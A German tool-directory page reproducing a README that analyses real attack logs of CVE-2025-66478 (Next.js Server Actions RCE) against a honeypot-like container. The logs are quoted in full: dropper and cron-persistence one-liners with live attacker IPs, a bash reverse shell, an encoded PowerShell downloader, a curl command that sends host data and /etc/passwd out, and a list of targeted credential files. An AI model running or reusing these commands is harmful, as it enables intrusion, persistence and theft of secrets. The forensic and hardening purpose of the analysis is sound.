Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-66478 — Analyse realer Angriffslogs der CVE-2025-66478 (Next.js Server Actions RCE) mit Malware-Beispielen, Verfolgung der Angreifer-IPs und Lektionen zur Härtung der Containersicherheit. | Kitploit
Tools/GitHubGitHub/exptechtw/cve-2025-66478
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationForensikMalware-AnalyseBedrohungsanalyseLernen & BildungIncident Response
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Analyse realer Angriffslogs der CVE-2025-66478 (Next.js Server Actions RCE) mit Malware-Beispielen, Verfolgung der Angreifer-IPs und Lektionen zur Härtung der Containersicherheit.

211vor 9 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen

CVE-2025-66478 - Analyse echter Angriffslogs der Next.js Server Actions RCE-Schwachstelle

Übersicht

Dieses Projekt sammelt echte Angriffslogs, die von einer im Internet freigegebenen Next.js 15.1.2-Anwendung (ausgeführt in einem Docker-Container) aufgezeichnet wurden. Diese Logs zeigen, wie die Schwachstelle CVE-2025-66478 im Feld von massiven automatisierten Angriffstools gescannt und ausgenutzt wird.

Aufzeichnungszeitraum: 2025-12-04 ~ 2025-12-06 (ca. 48 Stunden)

Umgebungsinformationen:

  • Framework: Next.js 15.1.2
  • Ausführungsumgebung: Bun v1.2.20
  • Container: Docker (Alpine Linux)
  • Zeitzone: Asia/Taipei

Angriffstypen-Statistiken

1. Schadprogramm-Download und -Ausführung (Dropper/Downloader)

Angreifer versuchen, über die Schwachstelle Befehle zum Herunterladen und Ausführen von Schadsoftware auszuführen.

Angriffsquell-IPURL der SchadsoftwareBeschreibung
216.158.232.43http://216.158.232.43:12000/sex.shBotnetz/Miner
38.207.161.212http://38.207.161.212/agentSchadsoftware-Agent
43.156.63.124http://43.156.63.124/tsdCron-Hintertür eingesetzt
154.38.121.219res.qiqigece.top/nginx3Als nginx getarnte Schadsoftware
47.79.42.91iot.632313373.xyz/nz.shIoT-Botnetz-Skript
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shMiner/Hintertür
103.135.101.15http://103.135.101.15/wocaosinm.shSchadskript
38.12.24.231http://38.12.24.231/kworkerAls Kernel Worker getarnte Schadsoftware
128.199.194.97http://128.199.194.97:9001/setup2.shInitialisierungsskript

Beispiel für Angriffsbefehle

# Typischer Dropper-Angriff
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Einschleusen einer Cron-Hintertür zur Persistenz
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Komplexer Persistenzangriff (mehrere Download-Methoden + Cron + Bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Reverse Shell

Angreifer versuchen, eine Reverse-Shell-Verbindung herzustellen, um interaktiven Zugriff zu erhalten.

# Bash Reverse Shell
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. PowerShell-Angriffe (Fehleinschätzung für Windows)

Angreifer nehmen fälschlicherweise an, dass das Ziel ein Windows-System ist, und versuchen, PowerShell-Befehle auszuführen.

# Base64-kodiertes bösartiges PowerShell
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Dekodiert:
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Mathematische Berechnungen zur Schwachstellenbestätigung
powershell -c "41*271"      # = 11111 (Bestätigungscode)
powershell -c "44225*41002" # = 1814113450

4. Informationssammlung (Information Gathering)

Angreifer versuchen, Systeminformationen für weitere Angriffe zu sammeln.

# Systeminformationen sammeln und exfiltrieren
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Anmeldeinformationsdiebstahl (Credential Harvesting)

Angreifer versuchen, verschiedene sensible Dateien und Anmeldeinformationen auszulesen.

Versuchte sensible Pfade

KategoriePfad
Cloud-Anmeldedaten/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
SSH-Schlüssel/root/.ssh/id_rsa, /root/.ssh/config
Git-Anmeldedaten/root/.git-credentials, /root/.gitconfig
Container/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Anwendungen/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Shell-Verlauf/root/.bash_history, /root/.zsh_history
Cloud-Tools/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Systemkonfiguration/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow

6. Exfiltration von Umgebungsvariablen

Erfolgreich exfiltrierte Container-Umgebungsvariablen über die Schwachstelle:

HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. DNS-Exfiltration

Angreifer verwenden DNS-Abfragen zur Datenexfiltration oder Schwachstellenbestätigung:

ping 5a58e4a0.log.dnslog.pp.ua.

Gründe für fehlgeschlagene Angriffe

Die meisten Angriffe scheitern aufgrund der reduzierten Natur von Alpine Linux-Containern:

Fehlendes ToolAuswirkung
curlHerunterladen von Schadsoftware nicht möglich
bashAusführung bash-spezifischer Syntax (z.B. Reverse Shell) nicht möglich
powershellWindows-Angriffe unwirksam
pythonPython-Downloader nicht nutzbar

Obwohl wget verfügbar ist, verlassen sich einige bösartige Skripte intern auf curl oder bash, was zur Fehlausführung führt.


Base64-Decodierungsbeispiele

Die Logs enthalten eine große Menge Base64-kodierter Daten. Nachfolgend einige dekodierte Ergebnisse:

Exfiltration von Systeminformationen

# digest: 'cm9vdAo='
Dekodiert: root

# digest: 'dGVzdAo='
Dekodiert: test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Dekodiert: vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Dekodiert: uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Exfiltration von Verzeichnislisten

# /tmp Verzeichnisinhalt
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Dekodiert:
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Angriffsquell-IP-Statistiken

Nachfolgend die aufgezeichneten IP-Adressen der Angriffsquellen:

Tool herunterladen